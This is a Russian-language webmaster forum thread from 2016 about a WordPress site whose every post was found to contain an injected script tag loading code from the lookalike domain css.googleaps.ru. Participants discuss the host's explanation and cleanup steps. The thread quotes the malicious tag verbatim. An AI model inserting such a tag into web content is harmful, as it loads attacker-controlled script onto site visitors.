Непонятный скрипт в каждой записи
Страницы: 1
[ Закрыто ] Непонятный скрипт в каждой записи
Подскажите что это за фигня такая, сегодня при редактировании текстов обнаружил что в КАЖДОЙ записи присутствует такой код <script src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script> проверка на вирусы ничего не дала, погуглил этот скрипт, вижу у многих такая проблема возникала, но толком никто не сказал что это за скрипт и как от него избавиться. Может кто-то из форумчан знает?
на вордпрессе?
Цитата
Krol пишет:
на вордпрессе?
Да, на вордпресе.
Начинает проясняться ситуация, написал хостеру в ТП вот его ответ: 
Как нам удалось выяснить, данные вставки кода были добавлены посредством уязвимости самой CMS WordPress, которая была устранена в версии 4.2.4.
Также, мы проверили все имеющиеся у нас резервные копии Вашего сайта. Данные вставки уже присутствуют в самой ранней копии базе данных сайта.
Соответственно, для того, чтобы их удалить, Вам потребуется воспользоваться интерфейсом phpMyAdmin, который доступен в разделе "Базы данных" в панели управления аккаунта, выполнить поиск в базе данных по выражению из вставки кода (например,css.googleaps.ru) и далее выполнить удаление строк.
У меня 2 вп на отдельном сервере, 1 тоже заполнен скриптами, причем удаляй или чистий бестолку, вирусов тоже не нашел, а на втором такого нету, вреда или редиректов не заметил от этого скрипта в итоге забил на него, с сайтом вроде все норм. Но у меня другой скрипт появляется.
Изменено: Krol - 23 Ноября 2016 07:40
Цитата
Krol пишет:
У меня 2 вп на отдельном сервере, 1 тоже заполнен скриптами, причем удаляй или чистий бестолку, вирусов тоже не нашел, а на втором такого нету, вреда или редиректов не заметил от этого скрипта в итоге забил на него, с сайтом вроде все норм. Но у меня другой скрипт появляется.
Я тоже вреда от него не заметил, но при переписке с ТП хостера, письмо от хостера приходит с пометкой "вредоносный код", хотя я не утверждал им что этот код вредоносный, просто попросил объяснить что это за код такой. К тому же ТП хостера говорит что данный скрипт не является родным для WP, а появился благодаря уязвимости. В инете тоже большинство склоняются к его "вредоносности" хотя никто и не говорит о его явных последствиях. В общем почистил БД от этого скрипта от греха подальше))) Щас меняю везде пароли)))
Подпишусь на тему, если что отпишите тут через недельку, если не трудно, вернется или нет, тоже если что почищу.
Цитата
Krol пишет:
Подпишусь на тему, если что отпишите тут через недельку, если не трудно, вернется или нет, тоже если что почищу.
Да, посмотрим что через неделю будет, Пока что сделал следующее:1. Почистил базу данных от этого скрипта (судя по гуглу их несколько видов, в бд нашел 2 разных вида, удалил к чертям их)
2. В htaccess поставил запрет на доступ к xmlrpc.php ( на одном из сайтов посоветовали, не знаю поможет или нет)
3. Запретил в файле function такому коду появляться в записях.Посмотрим что из этого получиться. Хотелось бы услышать сталкивался ли кто то еще с такой проблемой и как ее решили.
Цитата
Александр пишет:
Цитата
Krol пишет:
Подпишусь на тему, если что отпишите тут через недельку, если не трудно, вернется или нет, тоже если что почищу.
Да, посмотрим что через неделю будет, Пока что сделал следующее:1. Почистил базу данных от этого скрипта (судя по гуглу их несколько видов, в бд нашел 2 разных вида, удалил к чертям их)
2. В htaccess поставил запрет на доступ к xmlrpc.php ( на одном из сайтов посоветовали, не знаю поможет или нет)
3. Запретил в файле function такому коду появляться в записях.Посмотрим что из этого получиться. Хотелось бы услышать сталкивался ли кто то еще с такой проблемой и как ее решили.
В ТП хостера поппросил прислать по возможности больше инфы об этом скрипте,  я думал они что-то знают, и вот что они прислали:
"С нашей стороны, мы точно также воспользовались поисковыми системами для поиска информации о том, где именно находятся вставки кода, а также каким образом можно закрыть уязвимость." )))
Цитата
Krol пишет:
У меня 2 вп на отдельном сервере, 1 тоже заполнен скриптами, причем удаляй или чистий бестолку, вирусов тоже не нашел, а на втором такого нету, вреда или редиректов не заметил от этого скрипта в итоге забил на него, с сайтом вроде все норм. Но у меня другой скрипт появляется.
Черкани мне потом, я тебе выведу эту фигню
Тупанул, не о том написал)
Изменено: j.doe - 24 Ноября 2016 00:57
Тема больше неактуальна, скрипт вычистил, тему можно закрыть.
Цитата
Александр пишет:
Тема больше неактуальна, скрипт вычистил, тему можно закрыть.

Александр, спасибо за сообщение
Тему закрыл

пожалуйста, если Ваша тема потеряла свою актуальность, отпишите об этом в теме и скиньте ссылку на тему мне в ЛС.
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
21:22 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
16:18 Adtrafico - Правильная партнёрская сеть под бурж трафик 
12:26 Bropush - твой бро в монетизации сайта push-уведомлениями 
17:06 Perfect.Studio: InstAccountsManager — лучший инструмент для автоматизации заработка в Instagram 
16:04 VKAccountsManager — лучший инструмент для продвижения и заработка Вконтакте 
13:26 DreamCash.tl - заработок на онлайн-видео. До 95% отчислений, отличный конверт! 
11:46 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
06:49 Transit-Bit.com - Обмен USDT на IDR, THB, RUB и наличные 
13:32 Coin Click.cc - Быстрый и надежный обмен электронных валют в два клика 
11:17 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
22:21 ProxyWins.com - 15% по промо-коду "venividivici" 
17:00 Burzh.top|Партнерская программа под любой вид трафика (email, спам, УБТ) 
16:07 Ural-obmen.ru — выгодный сервис обмена 
15:57 Obama.ru - безопасный обмен криптовалют и электронных денежных средств 
11:02 Видимо, похороны СУПРа уже прошли как-то по-тихому 
22:18 Добро пожаловать в цифровой мир... 
23:41 Точные прогнозы на футбол 
12:04 Как получить рефералов и посетителей на сайт бесплатно. 
12:48 Каспкрски ОС 
11:21 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 
14:41 Бесплатный мини-аудит юзабилити и конверсии + технический SEO-аудит в подарок